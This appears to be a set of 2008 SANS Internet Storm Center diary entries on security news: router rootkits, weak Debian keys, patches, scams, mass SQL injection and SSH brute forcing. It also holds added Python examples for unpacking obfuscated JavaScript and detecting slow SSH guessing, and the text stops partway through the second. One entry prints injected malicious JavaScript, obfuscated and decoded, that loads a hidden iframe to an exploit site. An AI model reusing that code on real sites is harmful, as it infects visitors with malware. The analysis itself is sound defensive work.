If anyone doubts the capabilities of a simple access point, one only needs to go so far as checking in with Paul Asadoorian and Larry Pesce (of pauldotcom.com fame).  Their awesome book http://www.amazon.com/Linksys-WRT54G-Ultimate-Hacking-Asadoorian/dp/1597491667  (shameless plug) and SANS course ( SANS Security 535: Network Security Projects Using Hacked Wireless Routers )  provide much depth and coverage on the topic.

Now, on to the more sensitive topic... hacking IOS.  We can all remember just a few years ago when the Mike Lynn debacle occurred at Black Hat, when he was scheduled to present on IOS hacking.  Lawyers got involved, goons ripped pages out of conference giveaways, etc.  A couple of thoughts come to mind when dealing with the potential of a hacked router:

1. How to validate the IOS running on the device.  Obviously, it can lie, just as a kernel-level rootkit can lie.  My preference might be a steady routine of reflashing the device, although that would go against most organizations' notions of uptime (and I'm usually OK with that).  I do like that Muniz points to CIR as a remedy in this case:

<From the article>

Sean Comeau: Are there any existing tools to detect unauthorized modification
of IOS?

Sebastian Muniz: Yes, CIR "Cisco Information Retrieval" created by FX is THE
TOOL in this case. It's a framework capable of detecting those kinds of
modifications. This tool analyzes crash dumps by performing several tests on
them and taking a clean IOS image as a starting point. This is a great tool and
probably the only one able to do this, but it relies on the IOS functions that
generate the crash dump so, if those functions are hooked by the rootkit, the
result may not be correct. The thing is not that easy because CIR is able to
perform several tests and could detect the rootkit, but this will probably be
like a race, competing with each other to see who has the latest trick to
bother its counterpart. But in the case of the version of rootkit (DIK) that
will be presented at the conference, CIR will be able to detect it.
</From the article>

2. Router lockdown. 

Cisco has its Security Device Manager (SDM) http://www.cisco.com/go/sdm  with a good article on it here: http://www.cisco.com/en/US/prod/collateral/routers/ps5318/product_data_sheet0900aecd800fd118.html

The Center for Internet Security (CIS) has a Router Assessment Tool (RAT) that can be used on Windows or Unix-like operating systems to assess the security of a Cisco Router.  This tool can be found here:


Given the amount of interesting things to think about and do presented here... it's great that it's Memorial Day weekend in the U.S.A.  Have a great weekend, and think of those who have given their lives so that we can enjoy ours...

Mike Poor, Handler on Duty

Intelguardians, Inc.


Published: 2008-05-23

Wiping your mobile devices

Some recent emails to the Storm Center have further focused our attention on the need to wipe your mobile devices if you intend to sell/donate/pass them along.  I have a large box of mobile phones that I have done nothing with, as I don't feel confident in the manufacturers' suggestions for wiping data.  Many of them just involve resetting settings back to default, which in most cases just leaves all your information in memory.

My recommendation would have to be to do a complete wipe of the device, then reflash the system.  In most cases though, this is easier said than done.  For example, one recent post (Rich Mogull from Securosis http://securosis.com/2008/05/20/formatting-an-iphone-to-wipe-data/) suggested reflashing the iPhone, then un-checking the sync functionality for contacts, calendar, etc.  Following this, fill the iPhone with music and sync three times.  Then reflash to default, and sell your "clean" iPhone.

I would prefer to do a bit by bit wipe of devices if I were to part with them ...

<comment> you can have my iphone when you pry it from my cold dead hands </comment>   :-)

I would be interested in hearing people's stories/tips for wiping mobile devices and/or performing forensics on mobile devices.

Here are some links to Forensics hardware and software.

Links to articles on wiping iPhone and Blackberry:


Mike Poor, H.O.D.

Intelguardians, Inc




Published: 2008-05-22

From the mailbag

I don't want to jinx the next handler (well, I do but what comes around goes around) so without saying the 's' word or the 'q' word let me just say we are thankfully less than fully utilized and offer a few tidbits from the mailbag.

One reader sent a link to an article regarding various computer security laws and how you may be breaking them without knowing.  I'm not a lawyer, I don't play one on TV and I didn't spend last night in a hotel room so make sure you check with your legal department when considering action based on anything in that article.




Published: 2008-05-21

Three Cisco advisories released today

Cisco has released three advisories this week, two that cover DoS vulnerabilities in IOS SSH and the Service Control Engine (SCE) and one privilege escalation in Cisco Voice Portal (CVP).

While the "Exploitation and Public Announcements" portion of all three advisories states that the vulns were discovered in-house, it's a pretty safe bet that a fair number of security "researchers" are feverishly reverse engineering the updates to develop exploits for private use and/or public release.

Anytime we see a "spurious memory access" leading to a denial of service, thoughts immediately go to arbitrary code execution.  There is no evidence that this is possible, but in light of the recent work in IOS rootkits, vulns in Cisco devices should not be taken lightly.  Sebastian Muniz of CORE Security is scheduled to release a proof of concept Cisco IOS rootkit tomorrow at EuSecWest.  Stand by for more details.

Read 'em and update:

Cisco IOS Secure Shell Denial of Service Vulnerabilities

Cisco Service Control Engine Denial of Service Vulnerabilities

Cisco Voice Portal Privilege Escalation Vulnerability



Published: 2008-05-20

Java 6 Update 6 has been released

Sun has released Java 6 Update 6 including 13 bug fixes. At first glance going through the Release Notes, only one of them seems to be security related, but as always, it is recommended to update to the latest version (after appropriate testing).

You can check your current Java version here.

The update is still in the process of showing up through the standard Sun update mechanism. I have tested and run "C:\Program Files\Java\jre1.6.0_05\bin\jucheck.exe" and it still says I have the latest Java version.

IMPORTANT: Remember, as always, to manually uninstall any previous Java versions.

Raul Siles



Published: 2008-05-20

Podcast Episode Four has been released

Morning everyone,

Just a quick note to let everyone know that we put out Podcast Episode 4 this morning.  Just a few announcements at the beginning, and then I put the audio for May's Monthly "Reboot Wednesday" Podcast that we do through SANS on after that.  We'll be recording Episode five next week.  We'll let you know when it's out!

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.



Joel Esler



Published: 2008-05-20

List of malicious domains inserted through SQL injection

One of the main attack vectors we have seen during the last years is "silent" Web defacements, typically in the form of redirections to malicious JavaScript code that are inserted into the contents of Web pages using iframes, images, or other HTML tags. As many Web servers get their contents (or part of them) directly from a database, SQL injection vulnerabilities are widely exploited to insert the malicious references. You can find some of the previous related ISC diary entries here (by using Google).

Unfortunately, there is no silver bullet method to identify if a Web site (Web server or database) has been infected with new HTML tags, due to the fact that complex Web environments typically contain hundreds of scripts, redirections and references. One way of checking if a Web site is vulnerable and has been compromised is by searching for the specific malicious domains hosting the JavaScript and pointed out by the inserted references. We always try to emphasize these malicious domains in the diary entries so that you can search for or even block them.

Mike Johnson from Shadowserver has published a list of domains used in past and recent massive SQL injections that insert malicious JavaScript into websites. The list is focused solely on mass SQL injection attacks and does not replace other generic malware lists such as www.malwaredomainlist.com or malwaredomains.com. Mike plans to maintain this list as new domains come across over time. The list also contains an estimate of the current number of infected Web sites based on Google stats. This is a great initiative and a very useful resource, and I encourage you to check whether you can find references to any of these domains in:

  • Your Web server contents (static contents and database), meaning the server has been compromised and you need to clean it up and fix the vulnerability originally used by the attackers to insert the redirection tags.
  • Your network traffic, meaning your clients are accessing compromised Web servers and are being redirected to the malicious domains. These domains are typically trying to exploit vulnerable client-side software, so if your clients are not thoroughly updated, there is a higher chance that some of them have been compromised.

If you know about any other similar resource, or additional domains hosting (or that have hosted in the past) malicious code used in SQL injection attacks, please contact us.

Raul Siles


Published: 2008-05-19

Route filtering and its impact on the DNS fabric

Information Security consultants regularly work with their clients to identify their "critical infrastructure": those assets which are needed to keep the organization running at an acceptable level. On such engagements, after the employees have listed and described their own assets, I tend to ask them "... and what about Google?". A lot of companies really need a good search engine ranking for their clients to find them. Something which can and has been attacked. It is however often not quite clear whose responsibility it is to monitor components such as these: information security or marketing?

There are several other components which make up the internet fabric that help users get where they need to be. Today, the people at Renesys posted a fascinating blog entry showing what could go wrong at a completely different level: DNS. They identify how the hijacking of IP space can pose a valid risk to the reliability of the internet as a business medium. While malicious intent can't be proven, this is exactly what appears to have affected L.root-servers.net recently.

This is no reason to panic - it is however an indication of just one of many things the information security community needs to be aware of. Short lived BGP announcements have commonly been used to distribute spam, and inadvertent mistakes have brought down major web sites. Renesys' posting is an example of how a lack of route filtering can have even deeper, but less visible consequences.

Read their blog entry on the adventures of L.root-servers.net here.


Published: 2008-05-19

Text message and telephone aid scams

Jim recently wrote a diary on the various scams related to Myanmar's cyclone and the Sichuan earthquake.

Usually, these scams take place by means of web sites which accept funds through Paypal or sometimes even wire transfers. However, as with all types of unsolicited messages, these were bound to move to other media as well.

Earlier today we received interesting reports from China of text messages (SMS) being distributed which request the reader to transfer money to a certain account number, or even just reply to the message, to help fund relief for the Sichuan earthquake. In addition, late last week reports appeared of a message which invited readers to help the Red Cross fight "poverty and suffering" by making a call, or sending a text message.

While one would expect that more physical acts, such as sending a text message or calling a number, allow better identification of the culprits than the more obscure theft and resale of credit card numbers, this is often not the case. While the owner of a number may easily be identified in many cases, it is often just a company providing a service to another third party. The latter may have used fake details; for-a-fee telephone numbers, for both calls and SMS, are often purchased through service providers, which may require less stringent verification of their clients than the actual phone network.


Published: 2008-05-18

A Mileage Report from BlueHat

At Microsoft's BlueHat briefing earlier in the month there were great presentations and discussion of information relevant to how today's vulnerability/exploit trends will be exacerbated tomorrow. Along the lines of the information presented, I expect we all know, from reading vulnerability announcements, analysis, and public exploit work, how talented the researchers are and what the trends are. YMMV from mine, but my mileage got a boost during Cesar Cerrudo's Token Kidnapping presentation, which had an impact beyond what the title of the presentation indicates, and beyond what his HITBSecConf 2008 Dubai Token Kidnapping PDF has. Don't let the "title" of the paper throw you off ( ; ^ ).

Where the BlueHat rubber met the road

The BlueHat panel assembled by MS for discussion of the vulnerability research economy that has developed over the last few years did a great job. I can't summarize the whole panel discussion, nor does it look like the information will be made available, but what I want to mention here relates to mileage. (I hope that, when they're released, the MS BlueHat podcast "interviews" of the presenters and panelists contain the presenters' actual presentation information, so you can make your own evaluation of the storm: the "actual presentation" versus the mentioned podcast "interviews".)

Dan Kaminsky presented data on code development and reasonable current and future numbers of vulnerabilities that can be expected. The discussion had great information on who is paying how much for vulnerability research results. The panelists also shared quite a bit of "vulnerability economy" information that I haven't seen summarized in any one place, including discussion of how researchers get paid, and by whom.

At the end of the discussion, it was apparent that vendors are only going to buy/receive a percentage of discoverable (and exploitable) vulnerabilities via the vulnerability research economy, or from altruistic vulnerability researchers. And in the "vulnerability economy" that the panel described, vendors lose out bidding for research results to "private" groups who keep the vulnerability information for "private" use. I note the discussion of "private" groups purchasing vulnerability research remained civil.

In Summary

There have been many trend reports by many great research and analysis groups discussing vulnerabilities, information warfare and criminal activity attacks and trends. When I consider those reports, Dan Kaminsky's BlueHat presentation numbers, and the "vulnerability economy" panel discussion information, I'm left with an obvious conclusion: the ever-increasing number of unreported vulnerabilities being turned into 0-days is not going to slow down soon; it is increasing rapidly, driven by the increasing number of "private" groups focused on information warfare and criminal activity. And as always, should you accept the mission, detecting successful intrusions is the job.

Discussing indicators of exploitation and identifying complex vectors is typically easier when it's an information sharing effort. This is something SANS, the ISC Handlers, and ISC participants have been doing for quite a few years. So when those Deja-Vu moments occur, while you're dealing with the vendors, consider getting assistance and participate in getting the information out publicly as soon as possible: become an ISC participant, drop us a line (Contact) about what's happening to your systems.

Bluehat (Thanks SANS & MS)

Microsoft BlueHat Security Briefings: Spring 2008 Sessions

BlueHat Security Briefings Blog - with links to presenters sites

Bluehat Vulnerability Economy Panel - Panelists included:

Terri Forslof
Manager of Security Response, Tipping Point Technologies

Adam Shostack
Senior Security Program Manager, Microsoft

Jeremiah Grossman
Founder & CTO, WhiteHat Security

Dan Kaminsky
Director of PenTest, IOActive

Charlie Miller
Principal Analyst, Independent Security Evaluators

Researchers Papers

Token Kidnapping PDF, Cesar Cerrudo, Argeniss

I believe the related MS info is Microsoft Security Advisory (951306)- Vulnerability in Windows Could Allow Elevation of Privilege

For a non-Bluehat correlation see the recent "Application-Specific Attacks: Leveraging the ActionScript Virtual Machine" by Mark Dowd, IBM Global Technology Services, X-Force Researcher.



Published: 2008-05-17

XP SP3 Issues

According to an article published by Information Week, the newly released XP SP3 is causing systems to blue screen (aka BSOD) on AMD-based systems.  Microsoft and HP seem to think it centers on the Power Management feature.  Here is an example of a message you might receive:

A problem has been detected and Windows has been shut down to prevent damage to your computer...
Technical information:
*** STOP: 0x0000007E (0xC0000005, 0xFC5CCAF3, 0xFC90F8C0, 0xFC90F5C0

HP has posted a workaround that has you boot into Safe Mode and disable the Intel Power Management.

Apparently there are other problems with SP3 according to the article.  If you have deployed XP SP3 and have encountered the BSOD or other major issues with SP3, please let us know.  If you haven't deployed XP SP3 and you're waiting, I'd like to know the reasons behind this as well.  Remember there are some caveats that you need to be aware of before deploying this service pack.  Check out this ISC article for more information.


Published: 2008-05-17

Disaster donation scams continue

Now that you are done regenerating SSH keypairs and SSL certificates on your Debian and Ubuntu machines, we return you to our usual programming.  Oh, wait, we have an oldie but goody that has returned.  Ever since Hurricane Katrina back in 2005 (see http://isc.sans.org/diary.html?storyid=643), we've seen that after every significant natural disaster the scammers start registering domains and try to collect donations.  The last 2 weeks have seen Cyclone Nargis hit Myanmar and then the big earthquake in China, and as expected, we've seen registration of domains related to those disasters.  These may not all be scams, but we repeat the advice we first gave nearly 3 years ago: if you wish to donate money to help the victims of these disasters, we suggest you stick to the established charities that you have a relationship with (such as the Red Cross or Church World Service or the like) through their main web pages or the phone.


Published: 2008-05-16

INFOcon back to green

The Debian/Ubuntu SSL problem by now has sufficient media attention. Once the big security firms raise their threat level indicators, we at SANS ISC can go back to green :). 

Debian Wiki has a good (and evolving) write-up on problems and resolutions: wiki.debian.org/SSLkeys

As a reminder, all systems that contain Debian/Ubuntu generated cryptographic key material are potentially vulnerable. You need to check those "authorized_keys" files for SSH on all platforms, not just on Debian.


Published: 2008-05-15

INFOCon yellow: update your Debian generated keys/certs ASAP

As you can see, we raised the INFOCon level to yellow. The main idea behind INFOCon is to protect the Internet infrastructure at large, and the development of automated scripts exploiting key-based SSH authentication looks like a real threat to SSH servers around the world (any SSH server using public keys that were generated on a vulnerable Debian machine – meaning the keys were generated on a Debian machine between September 2006 and the 13th of May 2008).

Scripts that allow brute forcing of vulnerable keys (think of these as rainbow tables for SSH keys) are in the wild, so we would like to remind all of you to regenerate SSH keys ASAP.

Please keep in mind that SSL certificates should be regenerated as well. This can be even more problematic if you had your certificates signed since you'll have to go through this process again (and possibly pay money again).

More information is available in our previous diaries:






Published: 2008-05-15

Debian and Ubuntu users: fix your keys/certificates NOW

A couple of days ago Swa posted a diary about a critical Debian/Ubuntu PRNG security vulnerability.

Today Matt wrote in to let us know that H D Moore posted a web page containing all SSH 1024, 2048 and 4096-bit RSA keys he brute forced.

It is obvious that this is highly critical – if you are running a Debian or Ubuntu system, and you are using keys for SSH authentication (ironically, that's something we've been recommending for a long time), and those keys were generated between September 2006 and May 13th 2008 then you are vulnerable. In other words, those secure systems can be very easily brute forced. What's even worse, H D Moore said that he will soon release  a brute force tool that will allow an attacker easy access to any SSH account that uses public key authentication.

But this is not all – keep in mind that ANY cryptographic material created on vulnerable systems can be compromised. If you generated SSL keys on such Debian or Ubuntu systems, you will have to recreate the certificates and get them signed again. An attacker can even decrypt old SSH sessions now.

The Debian project guys released a tool that can detect weak keys (it is not 100% correct though as the blocklist in the tool can be incomplete). You can download the tool from http://security.debian.org/project/extra/dowkd/dowkd.pl.gz.

The bottom line is: this is very, very, very serious and scary. Please check your systems and make sure that you are both patched, and that you regenerated any potentially weak cryptographic material.




Published: 2008-05-14

War of the worlds?

There have been a lot of discussions going on about these injection attacks. The one thing in common so far has been that the culprits are abusing security vulnerabilities in various web applications, mainly SQL injection.

Exploiting such vulnerabilities has become relatively easy (since there are many vulnerable applications that use similar backend logic), so the bad guys started releasing various tools that enable them to compromise sites automatically. I analyzed one such tool at http://isc.sans.org/diary.html?storyid=4294; it was probably used for a lot of the SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground; one such tool in use with botnets was analyzed by Joe at SecureWorks, http://www.secureworks.com/research/threats/danmecasprox/).

While the motive for this is more or less standard – steal credentials or virtual goods so you can convert/sell that for real money (Mike and Steven from Shadowserver posted very nice articles at http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507 and http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080513) - while analyzing one such site today I saw an interesting rant, presumably by the author.

The site has already been mentioned multiple times (www.ririwow.cn, which appears to be finally taken down). The majority of attacks actually pointed to this site which happily served some exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:

"This is a mass invasion.        Safeguard the motherland's dignity!
I love my motherland!
Please understand that I
PLEASE SEND EMAIL TO kiss117276@163.com "

(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads up from our friend Paul from pauldotcom.com. Paul analyzed a compromised site which had this piece of JavaScript inserted:

n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}

In other words, the code checks whether the system language variable is set to ZH-CN (which is the case on systems running in Chinese) and redirects you to the site hosting the exploit only if it is not. So the rant might really be from the author after all, since the code attacks all non-Chinese machines. Are things getting more serious here, or is the bottom line still (and only) information stealing and money?
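The locale-gated iframe injection above can be recovered without ever running the script. The following Python is an added example (not code from the diary or from Paul's analysis): it pulls the four arguments out of an eval(function(p,a,c,k,e,d){...}(...)) wrapper, reverses the base-62 token substitution the packer performs, and flags the indicators a responder would then search for in server content and proxy logs. The packed sample is constructed for this example, with the placeholder host malware.example.invalid in place of a real domain.

```python
"""Static unpacker and triage for the "p,a,c,k,e,d" JavaScript packer.

Added example, not code from the diary or from the analysis it cites.  The
token substitution is reversed in Python, so the payload is never executed.
The sample script is constructed; malware.example.invalid is a placeholder.
"""
import re

# Trailing argument list of the packer wrapper: }('payload',radix,count,'words'.split('|')
ARGS_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)

# Constructed sample in the same shape as the injected script discussed above.
SAMPLE_SCRIPT = (
    r"""eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+"""
    r"""((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))"""
    r"""{while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};"""
    r"""c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}"""
    r"""('9(e.g==\'j-2\'){}4{3.i("<a f=8:\/\/d.5.c\/b.7 h=1 6=0><\/a>");}',62,20,"""
    r"""'|100|cn|document|else|example|height|htm|http|if|iframe|index|invalid|malware"""
    r"""|navigator|src|systemLanguage|width|writeln|zh'.split('|'),0,{}))"""
)

# What a responder looks for in the recovered code: a locale gate, a zero-size
# iframe and a document.write, the pattern seen in the compromised pages above.
INDICATORS = [
    ("locale check", re.compile(r"navigator\.(?:systemLanguage|userLanguage|language)\b")),
    ("hidden iframe", re.compile(r"<iframe[^>]*\b(?:height|width)\s*=\s*[\"']?0\b", re.I | re.A)),
    ("document.write", re.compile(r"document\.write(?:ln)?\s*\(")),
]
SRC_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I | re.A)


def js_unescape(s):
    """Minimal JS string-literal unescape (quotes, slash, backslash, n, t)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def decode_index(token, radix):
    """Reverse of the packer's e(): 0-9, a-z (10-35), A-Z (36-61); -1 if not a digit string."""
    value = 0
    for ch in token:
        if "0" <= ch <= "9":
            digit = ord(ch) - ord("0")
        elif "a" <= ch <= "z":
            digit = ord(ch) - ord("a") + 10
        elif "A" <= ch <= "Z":
            digit = ord(ch) - ord("A") + 36
        else:
            return -1
        if digit >= radix:
            return -1
        value = value * radix + digit
    return value


def unpack_packer(p, a, c, k):
    """Replace every \\b\\w+\\b token in p by k[decode(token)], as the packer's loop does."""
    words = k.split("|")
    if len(words) != c:
        raise ValueError(f"keyword list has {len(words)} entries, expected {c}")

    def substitute(m):
        tok = m.group(0)
        idx = decode_index(tok, a)
        if idx < 0 or idx >= c or words[idx] == "":
            return tok          # not a dictionary slot, or an empty slot: keep the literal
        return words[idx]

    return re.sub(r"\b\w+\b", substitute, p, flags=re.A)


def analyze(script):
    """Unpack a packer-wrapped script and return the recovered code plus triage hits."""
    m = ARGS_RE.search(script)
    if not m:
        raise ValueError("no p,a,c,k,e,d argument list found")
    payload, radix, count, words = m.groups()
    unpacked = unpack_packer(js_unescape(payload), int(radix), int(count), js_unescape(words))
    return {
        "unpacked": unpacked,
        "indicators": [name for name, rx in INDICATORS if rx.search(unpacked)],
        "iframe_sources": SRC_RE.findall(unpacked),   # hosts to hunt for in proxy logs or block
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_SCRIPT)
    print(result["unpacked"])
    print("indicators:", ", ".join(result["indicators"]))
    print("iframe sources:", result["iframe_sources"])
```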




Published: 2008-05-13

Microsoft office file block & MOICE

Microsoft introduced the ability to block file formats in the different programs in Office, as well as safer ways to open suspect files, about a year ago.

The file blocking is not based on the file extension but on the actual format (so renaming a rich text file (.rtf) to a .doc won't get around the restriction). Unfortunately it's set by making changes in the registry and, perhaps worse, it's a blocklist instead of a list of allowed file types. Still, if you never intend to open e.g. RTF files, you could block them.

Microsoft Office Isolated Conversion Environment (MOICE) is an alternate way to open office files away from the actual tool. Use it instead of the real thing if you cannot resist opening that unsolicited attachment promising whatever it promises.

It seems these tools aren't widely used, hence drawing a bit more attention to them might help protect a few in the end.

Swa Frantzen -- Gorilla Security


Published: 2008-05-13

OpenSSH: Predictable PRNG in debian and ubuntu Linux

Debian and Ubuntu Linux users should look into their OpenSSH setup. It turns out the PRNG (Pseudo Random Number Generator) used was predictable.

Remember patching isn't enough, you need to regenerate keys generated on these machines! Including those used in SSL certificates (X.509).

Worse: even good keys apparently can be exposed due to this. Quoting from the Debian reference below:

"Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation."

So merely using your (good) keys on an affected machine might be enough to get the key itself compromised.

Swa Frantzen -- Gorilla Security


Published: 2008-05-13

May 2008 black tuesday overview

Overview of the May 2008 Microsoft patches and their status.

MS08-026
  Description: Multiple vulnerabilities allow code execution when opening a malicious file. Files opened with Word and edited with Word in Outlook are of particular concern. Replaces MS08-009.
  Contra indications: KB 951207
  Known exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical, servers Important

MS08-027
  Description: The fixed vulnerability is an input validation failure leading to memory corruption and code execution. Replaces MS08-012 and MS07-037.
  Contra indications: KB 951208
  Known exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical, servers Important

MS08-028
  Affected: Jet database engine
  Description: The fixed vulnerability is an input validation failure leading to a buffer overflow and allowing code execution.
  Contra indications: KB 950749, SA 950627
  Known exploits: Actively exploited
  Microsoft rating: Critical
  ISC rating: clients PATCH NOW, servers Important

Microsoft malware protection engine
  Affected: Microsoft OneCare, Antigen, Defender and Forefront use the malware protection engine.
  Description: It suffers from multiple input validation failures leading to a Denial of Service.
  Contra indications: KB 952044
  Known exploits: No publicly known exploits
  Microsoft rating: Moderate
  ISC rating: clients Less Urgent, servers Important


We will update issues on this page as they evolve. We appreciate updates.
US-based customers can call Microsoft for free patch-related support on 1-866-PCSAFETY.
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- Gorilla Security


Published: 2008-05-12

Adobe Releases Security Updates

Last week, Adobe released security updates that should be deployed as a part of your normal patch procedures.  The updates available at Adobe.com address vulnerabilities which could cause Adobe Reader or Acrobat applications to crash or even allow an attacker to take control of the affected system.  More details about this set of updates are available at http://www.adobe.com/support/security/bulletins/apsb08-13.html.

I recommend that this update be added into the mix of testing and deployment along with the Windows updates to be released on Tuesday.  Mac OS X users should also update to either Acrobat 7.1.0 or version 8.1.2 at the earliest convenience.


Published: 2008-05-12

Brute-force SSH Attacks on the Rise

Greetings everyone.  Just a bit of a reminder that many colleges and universities are done for the spring semester, and the K12s are right around the corner.  As most of you already realize, this means that a number of very intelligent kids and young adults are soon to have far more free time on their hands (and less adult supervision during the normal working hours of their parents).  So I expect that there will be a bit of an increase in attacks and other general noise from outside corporate or campus networks, as we have observed in prior years.

In that frame of mind, a significant amount of brute force scanning has been reported by some of our readers and on other mailing lists.  And there does appear to be a bit of a spike reflected in the port 22/tcp sources in the past week in the DShield data.

Jim Owens and Jeanna Matthews of Clarkson University released a paper at the Usenix LEET '08 conference which investigates current methods and dictionaries used by attackers of SSH in the past several months.  The paper includes evaluations of common techniques used to defend against brute force attacks that are worth reading.

From the most recent reports I have seen, the attackers have been using 'low and slow' style attacks to avoid locking out accounts and/or being detected by IDS/IPS systems.  Some attackers seem to be using botnets to do a distributed-style attack, which also is not likely to exceed thresholds common on the network.

So be warned that there does appear to be a bit more activity involving SSH and weak or otherwise guessable passwords.  This would be a great time to do some investigation on your local network to see which servers have SSH open to the world on the default port and may need to have their security posture reassessed.  You might want to try a few of the techniques discussed in the paper by Owens and Matthews, such as:

  • Using the host based security tools of DenyHosts, fail2ban, or BlockHosts in conjunction with TCP-Wrappers to block access to servers across your organization.
  • Disable direct access to the root account.
  • Avoid using easily guessed user names such as only a first name or a last name.  (Side Note: Academia will need to look into the age old policy of publishing an online directory of account holders before this one will have much of an effect.)
  • Enforce strong passwords or use public key authentication in place of passwords (multi-factor or public key is the preferred method, especially for systems which contain sensitive data).
  • Generally reduce the number of publicly accessible services through iptables or similar host based security measures in addition to network firewalls.  (think defense in depth.)

You might note that there is one defense technique that was not even mentioned in the paper, nor recommended by me.  That technique is to lock accounts after X number of failed login attempts.  As I work in a similar environment as the authors, I can tell you that this technique has numerous issues when working with academia.  First and foremost, the potential for creating a denial of service issue must be weighed against the potential of attackers guessing the right password before IT Security notices.  The likelihood of having a student take out their frustration for a non-IT related issue on a professor or an ex-boyfriend or girlfriend is actually very significant.  Additionally, having a single sign-on infrastructure used from Web applications, Unix-based apps and interfaces, and Windows-based services means you have to do significant synchronization of information to make this technique effective against distributed and/or slow attacks.  Your mileage for using this technique may vary and it could be more valid in your environment.
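One way to surface the distributed and low-and-slow patterns described above without resorting to a per-account lockout, as an added Python example (not code from the diary or from the Owens and Matthews paper): it parses constructed sshd "Failed password" lines and aggregates them per source and per target account, so a guess spread across many hosts, each staying under a per-IP lockout counter, still produces an alert. The thresholds (6 failures per source, 3 sources per account, one hour of persistence for a slow source) are assumptions chosen for the example.

```python
"""Surface distributed and low-and-slow SSH password guessing in sshd logs.

Added example, not from the diary or the Owens/Matthews paper.  It parses the
standard OpenSSH syslog format and aggregates per source and per target account,
so guesses spread across many hosts (each staying under a lockout counter) are
still reported.  It only reports; it never locks accounts.  Thresholds and the
log excerpt are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed auth.log excerpt: one slow guesser against root (five tries over two
# hours), four hosts sharing one dictionary run against jsmith, one legitimate
# typo by alice, and one successful key login that must not count as a failure.
SAMPLE_LOG = """\
May 12 02:00:11 bastion sshd[2201]: Failed password for root from 203.0.113.5 port 40122 ssh2
May 12 02:30:42 bastion sshd[2210]: Failed password for root from 203.0.113.5 port 40190 ssh2
May 12 03:01:07 bastion sshd[2233]: Failed password for root from 203.0.113.5 port 40233 ssh2
May 12 03:31:55 bastion sshd[2241]: Failed password for root from 203.0.113.5 port 40301 ssh2
May 12 04:02:19 bastion sshd[2260]: Failed password for root from 203.0.113.5 port 40377 ssh2
May 12 04:10:03 bastion sshd[2271]: Failed password for invalid user jsmith from 198.51.100.7 port 51001 ssh2
May 12 04:10:09 bastion sshd[2272]: Failed password for invalid user jsmith from 198.51.100.8 port 51002 ssh2
May 12 04:10:15 bastion sshd[2273]: Failed password for invalid user jsmith from 198.51.100.9 port 51003 ssh2
May 12 04:10:21 bastion sshd[2274]: Failed password for invalid user jsmith from 198.51.100.10 port 51004 ssh2
May 12 04:11:02 bastion sshd[2280]: Accepted publickey for alice from 192.0.2.20 port 60000 ssh2
May 12 04:12:44 bastion sshd[2290]: Failed password for alice from 192.0.2.20 port 60010 ssh2
"""


def parse_failures(log_text, year=2008):
    """Return (timestamp, target_user, source_ip) for each failed-password line.

    Classic syslog lines carry no year, so the caller supplies it (assumed 2008 here)."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return events


def detect(events, per_ip_threshold=6, slow_min_count=3,
           slow_min_span=timedelta(hours=1), dist_min_sources=3):
    """Return sorted (kind, subject, count) findings.

    kind is 'burst' (one source over the per-IP counter), 'low-and-slow' (one
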